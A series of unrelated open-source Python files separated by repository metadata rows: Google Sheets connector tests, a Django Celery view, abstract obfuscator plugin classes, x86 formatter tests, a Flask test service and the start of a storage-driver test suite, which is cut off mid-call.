def test_headers_to_airbyte_stream(self):
sheet_name = "sheet1"
header_values = ["h1", "h2", "h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {header: {"type": "string"} for header in header_values},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
def test_duplicate_headers_retrived(self):
header_values = ["h1", "h1", "h3"]
expected_valid_header_values = ["h3"]
expected_duplicate_header_values = ["h1"]
actual_header_values, actual_duplicate_header_values = Helpers.get_valid_headers_and_duplicates(header_values)
self.assertEqual(expected_duplicate_header_values, actual_duplicate_header_values)
self.assertEqual(expected_valid_header_values, actual_header_values)
def test_duplicate_headers_to_ab_stream_ignores_duplicates(self):
sheet_name = "sheet1"
header_values = ["h1", "h1", "h3"]
# h1 is ignored because it is duplicate
expected_stream_header_values = ["h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {header: {"type": "string"} for header in expected_stream_header_values},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
def test_headers_to_airbyte_stream_blank_values_terminate_row(self):
sheet_name = "sheet1"
header_values = ["h1", "", "h3"]
expected_stream = AirbyteStream(
name=sheet_name,
json_schema={
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
# For simplicity, the type of every cell is a string
"properties": {"h1": {"type": "string"}},
},
supported_sync_modes=[SyncMode.full_refresh],
)
actual_stream = Helpers.headers_to_airbyte_stream(logger, sheet_name, header_values)
self.assertEqual(expected_stream, actual_stream)
def test_is_row_empty_with_empty_row(self):
values = [" ", "", " "]
self.assertTrue(Helpers.is_row_empty(values))
def test_is_row_empty_with_full_row(self):
values = [" ", "", " ", "somevaluehere"]
self.assertFalse(Helpers.is_row_empty(values))
def test_row_contains_relevant_data(self):
values = ["c1", "c2", "c3"]
relevant_indices = [2]
self.assertTrue(Helpers.row_contains_relevant_data(values, relevant_indices))
def test_row_contains_relevant_data_is_false(self):
values = ["", "", "c3"]
relevant_indices = [0, 1]
self.assertFalse(Helpers.row_contains_relevant_data(values, relevant_indices))
def test_parse_sheet_and_column_names_from_catalog(self):
sheet1 = "soccer_team"
sheet1_columns = frozenset(["arsenal", "chelsea", "manutd", "liverpool"])
sheet1_schema = {"properties": {c: {"type": "string"} for c in sheet1_columns}}
sheet2 = "basketball_teams"
sheet2_columns = frozenset(["gsw", "lakers"])
sheet2_schema = {"properties": {c: {"type": "string"} for c in sheet2_columns}}
catalog = ConfiguredAirbyteCatalog(
streams=[
ConfiguredAirbyteStream(
stream=AirbyteStream(name=sheet1, json_schema=sheet1_schema, supported_sync_modes=["full_refresh"]),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.overwrite,
),
ConfiguredAirbyteStream(
stream=AirbyteStream(name=sheet2, json_schema=sheet2_schema, supported_sync_modes=["full_refresh"]),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.overwrite,
),
]
)
actual = Helpers.parse_sheet_and_column_names_from_catalog(catalog)
expected = {sheet1: sheet1_columns, sheet2: sheet2_columns}
self.assertEqual(actual, expected)
def test_row_data_to_record_message(self):
sheet = "my_sheet"
cell_values = ["v1", "v2", "v3", "v4"]
column_index_to_name = {0: "c1", 3: "c4"}
actual = Helpers.row_data_to_record_message(sheet, cell_values, column_index_to_name)
expected = AirbyteRecordMessage(stream=sheet, data={"c1": "v1", "c4": "v4"}, emitted_at=1)
self.assertEqual(expected.stream, actual.stream)
self.assertEqual(expected.data, actual.data)
def test_get_formatted_row_values(self):
expected = [str(i) for i in range(10)]
row_data = RowData(values=[CellData(formattedValue=x) for x in expected])
actual = Helpers.get_formatted_row_values(row_data)
self.assertEqual(expected, actual)
def test_get_first_row(self):
spreadsheet_id = "123"
sheet = "s1"
expected_first_row = ["1", "2", "3", "4"]
row_data = [RowData(values=[CellData(formattedValue=v) for v in expected_first_row])]
client = Mock()
sheet_client = google_sheet_client(row_data, spreadsheet_id, client)
actual = Helpers.get_first_row(sheet_client, spreadsheet_id, sheet)
self.assertEqual(expected_first_row, actual)
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=True, ranges=f"{sheet}!1:1")
def test_get_first_row_empty_sheet(self):
spreadsheet_id = "123"
sheet = "s1"
row_data = []
client = Mock()
sheet_client = google_sheet_client(row_data, spreadsheet_id, client)
self.assertEqual(Helpers.get_first_row(sheet_client, spreadsheet_id, sheet), [])
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=True, ranges=f"{sheet}!1:1")
def test_get_sheets_in_spreadsheet(self):
spreadsheet_id = "id1"
expected_sheets = ["s1", "s2"]
client = Mock()
client.get.return_value.execute.return_value = Spreadsheet(
spreadsheetId=spreadsheet_id, sheets=[Sheet(properties=SheetProperties(title=t)) for t in expected_sheets]
)
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
actual_sheets = Helpers.get_sheets_in_spreadsheet(sheet_client, spreadsheet_id)
self.assertEqual(expected_sheets, actual_sheets)
client.get.assert_called_with(spreadsheetId=spreadsheet_id, includeGridData=False)
def test_get_available_sheets_to_column_index_to_name(self):
# To mock different return values depending on input args, we use side effects with this method
spreadsheet_id = "123"
sheet1 = "s1"
sheet1_first_row = ["1", "2", "3", "4"]
# Since pytest and unittest don't give a clean way to mock responses for exact input arguments,
# we use .side_effect to achieve this. This dict structure is spreadsheet_id -> includeGridData -> ranges
def mock_client_call(spreadsheetId, includeGridData, ranges=None):
if spreadsheetId != spreadsheet_id:
return None
# the spreadsheet only contains sheet1
elif not includeGridData and ranges is None:
mocked_return = Spreadsheet(spreadsheetId=spreadsheet_id, sheets=[Sheet(properties=SheetProperties(title=sheet1))])
elif includeGridData and ranges == f"{sheet1}!1:1":
mocked_return = Spreadsheet(
spreadsheetId=spreadsheet_id,
sheets=[Sheet(data=[GridData(rowData=[RowData(values=[CellData(formattedValue=v) for v in sheet1_first_row])])])],
)
m = Mock()
m.execute.return_value = mocked_return
return m
client = Mock()
client.get.side_effect = mock_client_call
with patch.object(GoogleSheetsClient, "__init__", lambda s, credentials, scopes: None):
sheet_client = GoogleSheetsClient({"fake": "credentials"}, ["auth_scopes"])
sheet_client.client = client
actual = Helpers.get_available_sheets_to_column_index_to_name(
sheet_client, spreadsheet_id, {sheet1: frozenset(sheet1_first_row), "doesnotexist": frozenset(["1", "2"])}
)
expected = {sheet1: {0: "1", 1: "2", 2: "3", 3: "4"}}
self.assertEqual(expected, actual)
def test_get_spreadsheet_id(self):
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1B_cPP9re66xI8uJK25dtY9Q/edit#gid=1820065035"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1B_cPP9re66xI8uJK25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGa-gwYGdV1BjcPP9re66xI8uJK25dtY9Q/edit"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGa-gwYGdV1BjcPP9re66xI8uJK25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q/"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q", result)
test_url = "https://docs.google.com/spreadsheets/d/18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q/#"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re_6xI8uJ-25dtY9Q", result)
test_url = "18vWlVH8BfjGegwY_GdV1BjcPP9re66xI8uJK25dtY9Q"
result = Helpers.get_spreadsheet_id(test_url)
self.assertEqual("18vWlVH8BfjGegwY_GdV1BjcPP9re66xI8uJK25dtY9Q", result)
if __name__ == "__main__":
unittest.main()
|
3cee165ba393dfca595c3019ecb399f361ad8f2c
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2020/06/24/How to Create a Celery Task Progress Bar in Django/djangoprogressbar/progress/example/views.py
|
72f9924a437b3be8657c0ffd484dfc82e452e1f1
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 203
|
py
|
views.py
|
from django.shortcuts import render
from .tasks import go_to_sleep
def index(request):
task = go_to_sleep.delay(1)
return render(request, 'example/index.html', {'task_id' : task.task_id})
|
7cfb0d7cfa2dc445091caf8e6065ac785e339f56
|
265e9c51da355620be1cd0c9d08b04fccf2d694b
|
/src/obfuscapk/obfuscator_category.py
|
8f3d467870344c9faa010106732b588a5adff17d
|
[
"MIT"
] |
permissive
|
ClaudiuGeorgiu/Obfuscapk
|
bc45f735c868db039b37e1a9f5c1e236ce6aced3
|
adb6e6462546f37407236b887549fa835ef1c115
|
refs/heads/master
| 2023-08-17T21:27:36.579324
| 2023-01-25T10:06:02
| 2023-01-25T10:06:02
| 202,535,048
| 998
| 267
|
MIT
| 2023-08-28T09:46:39
| 2019-08-15T12:13:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,364
|
py
|
obfuscator_category.py
|
#!/usr/bin/env python3
from abc import ABC, abstractmethod
from yapsy.IPlugin import IPlugin
from obfuscapk.obfuscation import Obfuscation
class IBaseObfuscator(ABC, IPlugin):
def __init__(self):
super().__init__()
self.is_adding_fields = False
self.is_adding_methods = False
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class ITrivialObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IRenameObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IEncryptionObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class ICodeObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IResourcesObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
class IOtherObfuscator(IBaseObfuscator):
@abstractmethod
def obfuscate(self, obfuscation_info: Obfuscation):
raise NotImplementedError()
|
f6fdd848ff60cb2afebbc99ec6d82ff558e1544e
|
22b57568dad3db4949056f783bf5f5d78aaa9ca4
|
/src/rust/iced-x86-py/tests/formatter_test.py
|
c7fae0c3059fa1b943ef8e38a7f2278954b827f5
|
[
"MIT"
] |
permissive
|
icedland/iced
|
d2178ea519c1472fb9c70c39c3a2f6428dc0d855
|
71f6d8372703e2487a973e0ad871a78348f63f8d
|
refs/heads/master
| 2023-08-31T12:01:21.264077
| 2023-08-30T18:03:52
| 2023-08-30T18:03:52
| 147,866,440
| 1,446
| 128
|
MIT
| 2023-09-05T17:24:21
| 2018-09-07T19:30:25
|
Rust
|
UTF-8
|
Python
| false
| false
| 9,963
|
py
|
formatter_test.py
|
# SPDX-License-Identifier: MIT
# Copyright (C) 2018-present iced project and contributors
import pytest
from iced_x86 import *
FMT_SYNTAXES = [
FormatterSyntax.GAS,
FormatterSyntax.INTEL,
FormatterSyntax.MASM,
FormatterSyntax.NASM,
]
def test_invalid_syntax() -> None:
with pytest.raises(ValueError):
Formatter(0x12345) # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_op_access_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.op_access(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_get_instruction_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.get_instruction_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_get_formatter_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.get_formatter_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_format_operand_arg(syntax: FormatterSyntax_) -> None:
instr = Decoder(64, b"\x62\xF2\x4F\xDD\x72\x50\x01").decode()
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.format_operand(instr, 100)
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_number_base(syntax: FormatterSyntax_) -> None:
for base in range(0, 20):
formatter = Formatter(syntax)
if base == 2 or base == 8 or base == 10 or base == 16:
assert formatter.number_base == 16
formatter.number_base = base
assert formatter.number_base == base
else:
assert formatter.number_base == 16
with pytest.raises(ValueError):
formatter.number_base = base
assert formatter.number_base == 16
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_options_props(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
formatter.uppercase_prefixes = True
formatter.uppercase_mnemonics = True
formatter.uppercase_registers = True
formatter.uppercase_keywords = True
formatter.uppercase_decorators = True
formatter.uppercase_all = True
formatter.first_operand_char_index = 10
formatter.tab_size = 4
formatter.space_after_operand_separator = True
formatter.space_after_memory_bracket = True
formatter.space_between_memory_add_operators = True
formatter.space_between_memory_mul_operators = True
formatter.scale_before_index = True
formatter.always_show_scale = True
formatter.always_show_segment_register = True
formatter.show_zero_displacements = True
formatter.hex_prefix = "0X"
formatter.hex_suffix = "H"
formatter.hex_digit_group_size = 5
formatter.decimal_prefix = "0D"
formatter.decimal_suffix = "D"
formatter.decimal_digit_group_size = 6
formatter.octal_prefix = "0O"
formatter.octal_suffix = "O"
formatter.octal_digit_group_size = 7
formatter.binary_prefix = "0B"
formatter.binary_suffix = "B"
formatter.binary_digit_group_size = 8
formatter.digit_separator = "`"
formatter.leading_zeros = True
formatter.uppercase_hex = False
formatter.small_hex_numbers_in_decimal = False
formatter.add_leading_zero_to_hex_numbers = False
formatter.number_base = 8
formatter.branch_leading_zeros = False
formatter.signed_immediate_operands = True
formatter.signed_memory_displacements = False
formatter.displacement_leading_zeros = True
formatter.memory_size_options = MemorySizeOptions.NEVER
formatter.rip_relative_addresses = True
formatter.show_branch_size = False
formatter.use_pseudo_ops = False
formatter.show_symbol_address = True
formatter.gas_naked_registers = True
formatter.gas_show_mnemonic_size_suffix = True
formatter.gas_space_after_memory_operand_comma = True
formatter.masm_add_ds_prefix32 = False
formatter.masm_symbol_displ_in_brackets = False
formatter.masm_displ_in_brackets = False
formatter.nasm_show_sign_extended_immediate_size = True
formatter.prefer_st0 = True
formatter.show_useless_prefixes = True
formatter.cc_b = CC_b.C
formatter.cc_ae = CC_ae.NB
formatter.cc_e = CC_e.Z
formatter.cc_ne = CC_ne.NZ
formatter.cc_be = CC_be.NA
formatter.cc_a = CC_a.NBE
formatter.cc_p = CC_p.PE
formatter.cc_np = CC_np.PO
formatter.cc_l = CC_l.NGE
formatter.cc_ge = CC_ge.NL
formatter.cc_le = CC_le.NG
formatter.cc_g = CC_g.NLE
assert formatter.uppercase_prefixes
assert formatter.uppercase_mnemonics
assert formatter.uppercase_registers
assert formatter.uppercase_keywords
assert formatter.uppercase_decorators
assert formatter.uppercase_all
assert formatter.first_operand_char_index == 10
assert formatter.tab_size == 4
assert formatter.space_after_operand_separator
assert formatter.space_after_memory_bracket
assert formatter.space_between_memory_add_operators
assert formatter.space_between_memory_mul_operators
assert formatter.scale_before_index
assert formatter.always_show_scale
assert formatter.always_show_segment_register
assert formatter.show_zero_displacements
assert formatter.hex_prefix == "0X"
assert formatter.hex_suffix == "H"
assert formatter.hex_digit_group_size == 5
assert formatter.decimal_prefix == "0D"
assert formatter.decimal_suffix == "D"
assert formatter.decimal_digit_group_size == 6
assert formatter.octal_prefix == "0O"
assert formatter.octal_suffix == "O"
assert formatter.octal_digit_group_size == 7
assert formatter.binary_prefix == "0B"
assert formatter.binary_suffix == "B"
assert formatter.binary_digit_group_size == 8
assert formatter.digit_separator == "`"
assert formatter.leading_zeros
assert not formatter.uppercase_hex
assert not formatter.small_hex_numbers_in_decimal
assert not formatter.add_leading_zero_to_hex_numbers
assert formatter.number_base == 8
assert not formatter.branch_leading_zeros
assert formatter.signed_immediate_operands
assert not formatter.signed_memory_displacements
assert formatter.displacement_leading_zeros
assert formatter.memory_size_options == MemorySizeOptions.NEVER
assert formatter.rip_relative_addresses
assert not formatter.show_branch_size
assert not formatter.use_pseudo_ops
assert formatter.show_symbol_address
assert formatter.gas_naked_registers
assert formatter.gas_show_mnemonic_size_suffix
assert formatter.gas_space_after_memory_operand_comma
assert not formatter.masm_add_ds_prefix32
assert not formatter.masm_symbol_displ_in_brackets
assert not formatter.masm_displ_in_brackets
assert formatter.nasm_show_sign_extended_immediate_size
assert formatter.prefer_st0
assert formatter.show_useless_prefixes
assert formatter.cc_b == CC_b.C
assert formatter.cc_ae == CC_ae.NB
assert formatter.cc_e == CC_e.Z
assert formatter.cc_ne == CC_ne.NZ
assert formatter.cc_be == CC_be.NA
assert formatter.cc_a == CC_a.NBE
assert formatter.cc_p == CC_p.PE
assert formatter.cc_np == CC_np.PO
assert formatter.cc_l == CC_l.NGE
assert formatter.cc_ge == CC_ge.NL
assert formatter.cc_le == CC_le.NG
assert formatter.cc_g == CC_g.NLE
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_memory_size_options_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.memory_size_options = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_b_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_b = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ae_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ae = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_e_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_e = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ne_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ne = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_be_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_be = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_a_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_a = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_p_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_p = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_np_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_np = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_l_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_l = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_ge_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_ge = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_le_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_le = 123 # type: ignore
@pytest.mark.parametrize("syntax", FMT_SYNTAXES)
def test_invalid_cc_g_arg(syntax: FormatterSyntax_) -> None:
formatter = Formatter(syntax)
with pytest.raises(ValueError):
formatter.cc_g = 123 # type: ignore
|
cecf106d481c1c766464a4586d9a1cda8fa4d65e
|
f8faa223d8ba64caab5a732bc6d1d9a944b62aa7
|
/pystiche/__init__.py
|
b0c13bfc0204048df5a2273301f5e66e76102ee4
|
[
"BSD-3-Clause"
] |
permissive
|
pystiche/pystiche
|
2f53e26f38b7fe96ec29259a084ba8ab2c2a9d36
|
71217c24557dfba05da5795547bf6f3034e7c66f
|
refs/heads/main
| 2023-04-13T04:01:40.275142
| 2022-03-18T21:59:12
| 2022-03-18T21:59:12
| 208,798,287
| 138
| 36
|
BSD-3-Clause
| 2023-04-11T12:31:29
| 2019-09-16T12:49:12
|
Python
|
UTF-8
|
Python
| false
| false
| 254
|
py
|
__init__.py
|
try:
from ._version import version as __version__ # type: ignore[import]
except ImportError:
__version__ = "UNKNOWN"
from .core import *
from . import loss, enc, demo, data, image, pyramid, optim
import os
os.makedirs(home(), exist_ok=True)
|
de1ae3512f336e53e9861a48f0442d9e9ec38083
|
f9d79da5a27d5469f3e904da4b0baecddaa4d02d
|
/test/integration/test_app/frontend/app.py
|
b2240017f836deecafc92b709c167c3c4f1b358b
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-app-mesh-controller-for-k8s
|
45c6be0401769af83bf50ba32fbd0682ea2bd9e4
|
a73352cfac548dad655ef31fb1765b10a54f384c
|
refs/heads/master
| 2023-09-03T15:04:16.369636
| 2023-08-14T23:41:04
| 2023-08-14T23:41:04
| 174,389,100
| 188
| 149
|
Apache-2.0
| 2023-09-12T04:07:46
| 2019-03-07T17:19:11
|
Go
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
app.py
|
import os
import requests
import config
from flask import Flask, request
from aws_xray_sdk.core import xray_recorder, patch_all
from aws_xray_sdk.ext.flask.middleware import XRayMiddleware
app = Flask(__name__)
xray_recorder.configure(
context_missing='LOG_ERROR',
service=config.XRAY_APP_NAME,
)
patch_all()
XRayMiddleware(app, xray_recorder)
@app.route('/defaultroute')
def default():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TIMEOUT_HOST + ':' + str(config.PORT) + '/defaultroute'
response = requests.get(backend_url)
return response.text
@app.route('/timeoutroute')
def timeout():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TIMEOUT_HOST + ':' + str(config.PORT) + '/timeoutroute'
response = requests.get(backend_url)
return response.text
@app.route('/tlsroute')
def tlsroute():
print(request.headers)
backend_url = 'http://' + config.BACKEND_TLS_HOST + ':' + str(config.PORT) + '/tlsroute'
response = requests.get(backend_url)
return response.text
if __name__ == '__main__':
app.run(host='0.0.0.0', port=config.PORT, debug=config.DEBUG_MODE)
|
382983ad760e46f8cfc7ccde1307f271844c977c
|
1e92cc7daabe240b374d73da462878e80814171b
|
/manila/tests/share/drivers/hpe/test_hpe_3par_driver.py
|
018c5e491c5f212257c31d1de4783d8e74575127
|
[
"Apache-2.0"
] |
permissive
|
openstack/manila
|
e211281dd16128ac5685cd7b1a13a09d9e6456e1
|
a93a844398a11a8a85f204782fb9456f7caccdbe
|
refs/heads/master
| 2023-08-19T04:23:24.084637
| 2023-08-17T14:55:58
| 2023-08-17T14:55:58
| 24,245,238
| 178
| 141
|
Apache-2.0
| 2023-08-03T10:43:19
| 2014-09-19T20:57:05
|
Python
|
UTF-8
|
Python
| false
| false
| 42,790
|
py
|
test_hpe_3par_driver.py
|
# Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from copy import deepcopy
import sys
from unittest import mock
import ddt
if 'hpe3parclient' not in sys.modules:
sys.modules['hpe3parclient'] = mock.Mock()
from manila import exception
from manila.share.drivers.hpe import hpe_3par_driver as hpe3pardriver
from manila.share.drivers.hpe import hpe_3par_mediator as hpe3parmediator
from manila import test
from manila.tests.share.drivers.hpe import test_hpe_3par_constants as constants
@ddt.ddt
class HPE3ParDriverFPGTestCase(test.TestCase):
@ddt.data((-1, 4),
(0, 5),
(0, -1))
@ddt.unpack
def test_FPG_init_args_failure(self, min_ip, max_ip):
self.assertRaises(exception.HPE3ParInvalid,
hpe3pardriver.FPG, min_ip, max_ip)
@ddt.data(('invalid_ip_fpg, 10.256.0.1', 0, 4),
(None, 0, 4),
(' ', 0, 4),
('', 0, 4),
('max_ip_fpg, 10.0.0.1, 10.0.0.2, 10.0.0.3, 10.0.0.4, 10.0.0.5',
0, 4),
('min_1_ip_fpg', 1, 4))
@ddt.unpack
def test_FPG_type_failures(self, value, min_ip, max_ip):
fpg_type_obj = hpe3pardriver.FPG(min_ip=min_ip, max_ip=max_ip)
self.assertRaises(exception.HPE3ParInvalid, fpg_type_obj, value)
@ddt.data(('samplefpg, 10.0.0.1', {'samplefpg': ['10.0.0.1']}),
('samplefpg', {'samplefpg': []}),
('samplefpg, 10.0.0.1, 10.0.0.2',
{'samplefpg': ['10.0.0.1', '10.0.0.2']}))
@ddt.unpack
def test_FPG_type_success(self, value, expected_fpg):
fpg_type_obj = hpe3pardriver.FPG()
fpg = fpg_type_obj(value)
self.assertEqual(expected_fpg, fpg)
@ddt.ddt
class HPE3ParDriverTestCase(test.TestCase):
def setUp(self):
super(HPE3ParDriverTestCase, self).setUp()
# Create a mock configuration with attributes and a safe_get()
self.conf = mock.Mock()
self.conf.driver_handles_share_servers = True
self.conf.hpe3par_debug = constants.EXPECTED_HPE_DEBUG
self.conf.hpe3par_username = constants.USERNAME
self.conf.hpe3par_password = constants.PASSWORD
self.conf.hpe3par_api_url = constants.API_URL
self.conf.hpe3par_san_login = constants.SAN_LOGIN
self.conf.hpe3par_san_password = constants.SAN_PASSWORD
self.conf.hpe3par_san_ip = constants.EXPECTED_IP_1234
self.conf.hpe3par_fpg = constants.EXPECTED_FPG_CONF
self.conf.hpe3par_san_ssh_port = constants.PORT
self.conf.ssh_conn_timeout = constants.TIMEOUT
self.conf.hpe3par_fstore_per_share = False
self.conf.hpe3par_require_cifs_ip = False
self.conf.hpe3par_cifs_admin_access_username = constants.USERNAME,
self.conf.hpe3par_cifs_admin_access_password = constants.PASSWORD,
self.conf.hpe3par_cifs_admin_access_domain = (
constants.EXPECTED_CIFS_DOMAIN),
self.conf.hpe3par_share_mount_path = constants.EXPECTED_MOUNT_PATH,
self.conf.my_ip = constants.EXPECTED_IP_1234
self.conf.network_config_group = 'test_network_config_group'
self.conf.admin_network_config_group = (
'test_admin_network_config_group')
self.conf.filter_function = None
self.conf.goodness_function = None
def safe_get(attr):
try:
return self.conf.__getattribute__(attr)
except AttributeError:
return None
self.conf.safe_get = safe_get
self.real_hpe_3par_mediator = hpe3parmediator.HPE3ParMediator
self.mock_object(hpe3parmediator, 'HPE3ParMediator')
self.mock_mediator_constructor = hpe3parmediator.HPE3ParMediator
self.mock_mediator = self.mock_mediator_constructor()
# restore needed static methods
self.mock_mediator.ensure_supported_protocol = (
self.real_hpe_3par_mediator.ensure_supported_protocol)
self.mock_mediator.build_export_locations = (
self.real_hpe_3par_mediator.build_export_locations)
self.driver = hpe3pardriver.HPE3ParShareDriver(
configuration=self.conf)
def test_driver_setup_success(self,
get_vfs_ret_val=constants.EXPECTED_GET_VFS):
"""Driver do_setup without any errors."""
self.mock_mediator.get_vfs.return_value = get_vfs_ret_val
self.driver.do_setup(None)
conf = self.conf
self.mock_mediator_constructor.assert_has_calls([
mock.call(hpe3par_san_ssh_port=conf.hpe3par_san_ssh_port,
hpe3par_san_password=conf.hpe3par_san_password,
hpe3par_username=conf.hpe3par_username,
hpe3par_san_login=conf.hpe3par_san_login,
hpe3par_debug=conf.hpe3par_debug,
hpe3par_api_url=conf.hpe3par_api_url,
hpe3par_password=conf.hpe3par_password,
hpe3par_san_ip=conf.hpe3par_san_ip,
hpe3par_fstore_per_share=conf.hpe3par_fstore_per_share,
hpe3par_require_cifs_ip=conf.hpe3par_require_cifs_ip,
hpe3par_cifs_admin_access_username=(
conf.hpe3par_cifs_admin_access_username),
hpe3par_cifs_admin_access_password=(
conf.hpe3par_cifs_admin_access_password),
hpe3par_cifs_admin_access_domain=(
conf.hpe3par_cifs_admin_access_domain),
hpe3par_share_mount_path=conf.hpe3par_share_mount_path,
my_ip=self.conf.my_ip,
